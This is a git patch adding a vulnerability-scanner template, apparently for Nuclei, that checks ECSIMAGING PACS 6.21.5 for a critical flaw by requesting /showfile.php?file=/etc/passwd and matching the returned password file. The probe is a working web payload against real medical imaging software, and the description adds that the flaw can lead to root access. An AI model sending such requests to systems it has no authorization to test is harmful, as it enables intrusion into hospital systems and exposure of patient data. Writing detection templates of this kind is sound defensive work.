From 70501101a6967e8f398e7d70822fcb28ac117ee8 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 12 May 2022 13:50:38 +0530
Subject: [PATCH] Create ecsimagingpacs-rce.yaml

---
 vulnerabilities/other/ecsimagingpacs-rce.yaml | 25 +++++++++++++++++++
 1 file changed, 25 insertions(+)
 create mode 100644 vulnerabilities/other/ecsimagingpacs-rce.yaml

diff --git a/vulnerabilities/other/ecsimagingpacs-rce.yaml b/vulnerabilities/other/ecsimagingpacs-rce.yaml
new file mode 100644
index 0000000000..30312f657b
--- /dev/null
+++ b/vulnerabilities/other/ecsimagingpacs-rce.yaml
@@ -0,0 +1,25 @@
+id: ecsimagingpacs-rce
+
+info:
+  name: ECSIMAGING PACS 6.21.5 - Remote code execution
+  author: ritikchaddha
+  severity: critical
+  description: ECSIMAGING PACS Application in 6.21.5 and bellow suffers from a OS Injection vulnerability. The parameter `file` on the webpage /showfile.php can be exploited with simple OS injection to gain root access. www-data user has sudo NOPASSWD access
+  reference: https://www.exploit-db.com/exploits/49388
+  tags: ecsimagingpacs,rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/showfile.php?file=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200